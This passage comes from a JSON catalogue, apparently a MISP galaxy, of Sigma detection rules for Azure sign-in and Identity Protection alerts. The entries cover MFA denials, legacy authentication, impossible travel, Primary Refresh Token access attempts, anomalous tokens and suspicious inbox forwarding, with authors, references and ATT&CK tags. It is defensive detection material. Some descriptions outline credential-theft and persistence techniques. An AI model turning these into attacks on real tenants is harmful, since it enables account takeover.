"4f77e1d7-3982-4ee0-8489-abf2d6b75284", "value": "Sign-ins from Non-Compliant Devices" }, { "description": "Detects risky authentication from a non AD registered device without MFA being required.", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-01-10", "falsepositive": [ "Unknown" ], "filename": "azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "572b12d4-9062-11ed-a1eb-0242ac120002", "value": "Suspicious SignIns From A Non Registered Device" }, { "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-01", "falsepositive": [ "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" ], "filename": "azure_app_ropc_authentication.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml" ], "tags": [ "attack.t1078", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", "value": "Applications That Are Using ROPC Authentication Flow" }, { "description": "Alert on when legacy authentication has been used on an account", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-17", "falsepositive": [ "User has been put in acception group so they can use legacy authentication" ], "filename": "azure_legacy_authentication_protocols.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", "value": "Use of Legacy Authentication Protocols" }, { "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ 
"Unknown" ], "filename": "azure_user_login_blocked_by_conditional_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml" ], "tags": [ "attack.credential-access", "attack.initial-access", "attack.t1110", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", "value": "User Access Blocked by Azure Conditional Access" }, { "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_mfa_interrupted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110", "attack.t1621" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "954a1639-f2d6-407d-aef3-4917622ca493", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", "value": "Multifactor Authentication Interrupted" }, { "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-01", "falsepositive": [ "Service Account misconfigured", "Misconfigured Systems", "Vulnerability Scanners" ], "filename": "azure_conditional_access_failure.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1110", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" }, { "description": "Detect failed authentications from countries you do not operate out of.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." 
], "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", "value": "Failed Authentications From Countries You Do Not Operate Out Of" }, { "description": "Monitor and alert for sign-ins by unknown devices from non-trusted locations.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_sign_ins_from_unknown_devices.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", "value": "Sign-ins by Unknown Devices" }, { "description": "Detects when failed sign-ins (of any type) increased by 10% or greater.", "meta": { 
"author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", "creation_date": "2022-08-11", "falsepositive": [ "Unlikely" ], "filename": "azure_ad_auth_failure_increase.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", "value": "Increased Failed Authentications Of Any Type" }, { "description": "Detects when there is a interruption in the authentication process.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "azure_unusual_authentication_interruption.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8366030e-7216-476b-9927-271d79f13cf3", "value": "Azure Unusual Authentication Interruption" }, { "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", "meta": { "author": "AlertIQ", "creation_date": 
"2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_account_lockout.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_account_lockout.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "value": "Account Lockout" }, { "description": "Detect failed attempts to sign in to disabled accounts.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_login_to_disabled_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "value": "Login to Disabled Account" }, { "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey 
Bercik '@baileybercik'", "creation_date": "2022-06-01", "falsepositive": [ "Applications that are input constrained will need to use device code flow and are valid authentications." ], "filename": "azure_app_device_code_authentication.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml" ], "tags": [ "attack.t1078", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", "value": "Application Using Device Code Authentication Flow" }, { "description": "Detects when an account is disabled or blocked for sign in but tried to log in", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-17", "falsepositive": [ "Account disabled or blocked in error", "Automation account has been blocked or disabled" ], "filename": "azure_blocked_account_attempt.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", "value": "Account Disabled or Blocked for Sign 
in Attempts" }, { "description": "A user has denied an MFA prompt, indicating they did not initiate the sign-in; this could mean an attacker has the password for the account.", "meta": { "author": "AlertIQ", "creation_date": "2022-03-24", "falsepositive": [ "Users who legitimately sign in but mis-click the Deny button on the MFA prompt." ], "filename": "azure_mfa_denies.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_denies.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110", "attack.t1621" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "954a1639-f2d6-407d-aef3-4917622ca493", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "value": "Multifactor Authentication Denied" }, { "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-06-30", "falsepositive": [ "If this was approved by System Administrator." 
], "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", "value": "Users Authenticating To Other Azure AD Tenants" }, { "description": "Monitor and alert for device registration or join events where MFA was not performed.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_device_registration_or_join_without_mfa.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", "value": "Device Registration or Join Without MFA" }, { "description": "Detect when authentications to important application(s) only required single-factor authentication", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If 
this was approved by System Administrator." ], "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f272fb46-25f2-422c-b667-45837994980f", "value": "Authentications To Important Apps Using Single Factor Authentication" }, { "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_anonymous_ip_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be4d9c86-d702-4030-b52e-c7859110e5e8", "value": "Activity From Anonymous IP Address" }, { "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_token_issuer_anomaly.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" ], "tags": [ "attack.t1606", "attack.credential-access" ] }, "related": [ { "dest-uuid": "94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3393cba-31f0-4207-831e-aef90ab17a8c", "value": "SAML Token Issuer Anomaly" }, { "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Connecting to a VPN, performing activity and then dropping and performing additional activity." 
], "filename": "azure_identity_protection_impossible_travel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2572bf9-e20a-4594-b528-40bde666525a", "value": "Impossible Travel" }, { "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated." 
], "filename": "azure_identity_protection_prt_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "value": "Primary Refresh Token Access Attempt" }, { "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_malicious_ip_address_suspicious.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36440e1c-5c22-467a-889b-593e66498472", "value": "Malicious IP Address Sign-In Suspicious" }, { "description": "Indicates that the token has abnormal characteristics, such as an unusual token lifetime or a token that is replayed from an unfamiliar location.", "meta": { "author": "Mark Morowczynski '@markmorow'", "creation_date": "2023-08-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_anomalous_token.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6555754e-5e7f-4a67-ad1c-4041c413a007", "value": "Anomalous Token" }, { "description": "Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_new_coutry_region.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adf9f4d2-559e-4f5c-95be-c28dff0b1476", "value": "New Country" }, { "description": "Indicates sign-in from a malicious IP address based on high failure rates.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_malicious_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "value": "Malicious IP Address Sign-In Failure Rate" }, { "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_anomalous_user.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" ], "tags": [ "attack.t1098", "attack.persistence" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "258b6593-215d-4a26-a141-c8e31c1299a6", "value": "Anomalous User Activity" }, { "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_suspicious_browser.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "944f6adb-7a99-4c69-80c1-b712579e93e6", "value": "Suspicious Browser Activity" }, { "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "A legitimate forwarding rule." 
], "filename": "azure_identity_protection_inbox_forwarding_rule.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml" ], "tags": [ "attack.t1140", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "value": "Suspicious Inbox Forwarding Identity Protection" }, { "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "User changing to a new device, location, browser, etc." 
